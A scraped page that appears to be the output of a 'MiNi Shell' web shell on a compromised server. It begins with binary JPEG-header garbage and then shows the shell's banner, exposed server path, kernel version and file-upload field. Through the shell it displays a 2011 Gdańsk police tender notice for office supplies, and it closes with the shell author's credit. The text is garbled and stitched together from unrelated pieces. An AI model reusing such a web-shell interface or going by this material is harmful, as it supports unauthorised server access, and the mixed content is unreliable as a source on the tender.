JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110520/122892-N-2011.html

<p class="kh_header"><b>Gdańsk: Dostawa materiałów kancelaryjno-biurowych dla KWP w Gdańsku</b><br>
<b>Numer ogłoszenia: 122892 - 2011; data zamieszczenia: 20.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Gdańsku , ul. Okopowa 15, 80-819 Gdańsk, woj. pomorskie, tel. 058 3214817, faks 058 3214810.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów kancelaryjno-biurowych dla KWP w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Termin realizacji umowy 
zadanie 1a 30 dni od dnia podpisania umowy
zadanie 1b 
I transza  20 dni od dnia podpisania umowy
II transza 20.09.2011 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Druk ofertowy wraz z oświadczeniem o podwykonawcach
2.W przypadku ustanowienia pełnomocnika do reprezentowania w postępowaniu do oferty należy dołączyć 
pełnomocnictwo
3. certyfikat jakości papieru</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 10:50, miejsce: Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa materiałów kancelaryjno-biurowych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WYKAZ ASORTYMENTOWY

L.p	Asortyment	J.m	Ilość	Cena
jednostkowa
netto	VAT %	Wartość brutto poz. asortymentowej
4x5+6	Uwagi /
opis asortymentu zamiennego
1	2	3	4	5	6	7	8

1	Cienkopis typu Pelikan 96F - oprawiona metalowa końcówka; grubość linii 0,4mm, specjalna skuwka chroniąca przed wysychaniam - dostępność w 4 kolorach 	szt.	1 530				Czarny 450szt. Niebieski 370szt.  Zielony 350szt.  Czerwony 360 szt.
2	Datownik samotuszujący typu Trodat 4810, wysokość czcionki dokładnie 3,8 mm-4,2 mm data w wersji ISO i polskiej 	szt.	25				 

3	Długopis żelowy z wymiennym wkładem, trwała przezroczysta obudowa, miękki gumowy uchwyt oraz wykończenia w kolorze wkładu, długość pisania 800m, grubość linii 0,5mm	szt.	1 300				Czarny 325 szt. Niebieski 325szt.  Zielony 325szt.  Czerwony 325 szt.

4
	Wkład do długopisu j.w. - kolor niebieski	szt.	100				 
5	Długopis typu Lexi - skuwka w kolorze wkładu długopisu, grubość kulki 0,7mm, długość linii pisania 1 500m, wymienny wkład	szt.	2 450				Czarny 695 szt. Niebieski 1165 szt. zielony 285szt.  Czerwony 305 szt.
6	Długopis typu Toma - automatyczny, grubość kulki do 0,5 mm, obudowa gwiazdki, długość linii pisania min. 4000 mb, kolory czarny i niebieski 	szt.	720				niebieski 400szt.
Czarny 320szt.

7	Długopis typu Stick-grubość linii pisania 0,7mm,długość pisania 1000m	szt.	3 680				Niebieski 2000zt.
Czarny 1680szt.
8	Dziurkacz metalowy na min. 30 kartek, głębokość wsuwania kartek 12 mm, mocna, stabilna konstrukcja, blokada położenia dźwigni, listwa formatowa, wskażnik środka strony,antypoślizgowa nakładka na dźwigni, 5 lat gwarancji	szt.	67				

9	Gumka ołówkowa do ścierania, miękka, nadająca się do wszelkiego rodzaju powierzchni, o wymiarach min.: długość 6 cm, szerokość 2 cm, grubość 1,2 cm 	szt	160				

10
	Karteczki samoprzylepne 76x76, 100 kartek w bloczku, 12 notesików w zgrzewce	op.	67				
11	Bezbarwny klej do papieru w płynie min. 50ml, wyposażony w gabczastą końcówkę do nanoszenia kleju	szt.	690				
12	Klej w sztyfcie 22g 	szt.	2 420				

13	Klej termoaktywny w sztabkach                 O 11,2 x 200 mm przezroczysty do pistoletów - klejarek do papieru	szt.	1 160				
14	Koperty małe s/k C6 114x162mm białe	kart.	417				kart.=1000 szt.
15
	Koperty średnie s/k B5 176x250mm szare	kart.	124				kart.=500 szt.

16
	Koperty średnie s/k B5 176x250mm białe	kart.	103				kart.=500 szt.
17	Koperty aktowe s/k C4 250x353mm brąz	kart.	155				kart.=250 szt.
18	Koperty E4 280x400mm s/k brąz	kart.	42				kart.=250 szt.
19	Koperty z rozszerzalnym dnem i bokiem s/k 250x40x353mm brąz	kart.	33				kart.=250 szt.
20	Koperty aktowe s/k B4 250x353mm białe	kart.	16				

21	Korektor w taśmie typu Toma - rozmiar: 5mmx8m, kolor taśmy biały, system kontroli naprężenia taśmy, do korygowania na różnych rodzajach papieru	szt.	278				

22
	Koszulka groszkoweA4, typu Esselte, o grubości min. 48 mikronów,
 op 100 szt.	opak.	341				
23	Linijki plastikowe 30cm	szt.	140				
24	Linijki plastikowe 50cm	szt.	105				 

25	Marker permanentny typu Snowman z okrągłą lub ściętą końcówką, do pisania na każdej powierzchni, kolory: czarny, niebieski, czerowny, zielony	szt.	702				Czarny 272szt. Niebieski 250szt.  Zielony 100szt.  Czerwony 80 szt.
26	Nożyczki biurowe o długości 16 cm, czarne niełamliwe rączki	szt.	124				 

27	Nożyczki biurowe o długości 20,5 cm, czarne niełamliwe rączki	szt.	42				

28
	Ołówek zwykły HB biurowy	szt.	1 010				
29	Papier do faksu 100mbx210mmx1 - typu Emerson	rolka	153				
30	Papier do faksu 30mbx 210mmx1 - typu Emerson	rolka	297				
31	Papier do faksu 50mbx210mmx1 - typu Emerson	rolka	26				 
32	Papier pakowy szary	kg	85				 

33	Plastelina po 8szt w opak.	opak.	94				 

34
	Poduszka do stempli typu Trodat 110x70mm nasączona, w kolorach: czarny, niebieski, czerwony, zielony	szt.	83				Czarny 15szt. Niebieski 26szt.  Zielony 10szt.  Czerwony 32 szt.
35	Segregator z mechanizmem ekonomicznym, gruby karton pokryty poliolefiną, dwustronna etykieta, dolne krawędzie wzmocnione A4 75mm z dżwignią, kolorowe	szt.	403				Czarny 100szt. Niebieski 103szt.  Zielony 100szt.  Czerwony 100szt.
36	Skoroszyt A4 kartonowy	szt.	3 500				 

37	Skoroszyt A4, tekturowy połówka, zawieszkowy	szt.	325				 
38	Skoroszyt A4, z PCV, wpinany, przód wykonany  z przezroczystej folii, kieszonka na opis, dostępny w róznych kolorach	szt.	510				 
39
	Skorowidz A5, twarda okładka,  96 kart	szt.	138				 
40

	Spinacz krzyżowy o wys. 41mm po 50szt. w opak.	opak.	121				
41	Spinacz T 28 po 100szt. w opak.	opak.	940				
42	Nici lniane - dratwa; 25dag	szt.	454				
43	Taśma klejąca przezroczysta, szerokość minimum 24mm, długość 30mb, po 8 szt. w opak.	opak.	845				
44	Taśma termiczna biała do maszyn liczących 57mm/30m typu Emerson	rolka	125				
45
	Taśma pakowa brązowa 48mmx66m	szt.	416				
46

	Teczka tekturowa wiązana 350 g - tasiemki bawełniane o dł. Ok. 12 cm.	szt.	38 250				 
47	Temperówka - kostka metalowa pojedyncza	szt.	100				 
48	Tusz wodny do stempli, minimum 25 ml, nakrętka butelki w kolorze tuszu, czarny, niebieski, czerwony, zielony	szt.	388				Czarny 140szt. Niebieski 110szt.  Zielony 58szt.  Czerwony 80 szt.
49
	Zakreślacz typu Donau, grubość linii pisania 1-5 mm, długość linii pisania do 140 m, gumowane boki zapobiegające wyślizgiwaniu się zakreślacza z dłoni, dostepność w 4 różnych kolorach	szt.	290				Zółty 105szt. Pomarańczowy 75szt. Różowy 55szt. Zielony 55 szt.
50	Zeszyt A5, kratka, 60kartkowy	szt.	385				 
51	Zeszyt j.w., twarda okładka,  96k. 	szt.	280				 
52	Zeszyt akademicki A4, kratka, twarda okładka, szyty 96k.	szt.	480				
53	Zszywacz metalowy, na minimum 30 kartek zszycia, na zszywki 24/6 i 26/6, maksymalna głębokość wsuwania kartek 60 mm, ilość zszywek w magazynku 80 szt.	szt.	129				
54	Zszywki metalowe 24/6 w pudełeczkach po 1000 szt.	pudeł.	2 655.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa materiałów kancelaryjno-biurowych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Asortyment	J.m	Ilość	Cena
jednostkowa
netto	VAT %	Wartość brutto poz. asortymentowej
4x5+6	Uwagi /
opis asortymentu zamiennego
1	2	3	4	5	6	7	8
1.	Papier ksero format A4, 80g/m2 +/- 2 , ryza po  500 kart., białość CIE 166 +/-3	ryza	10813.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com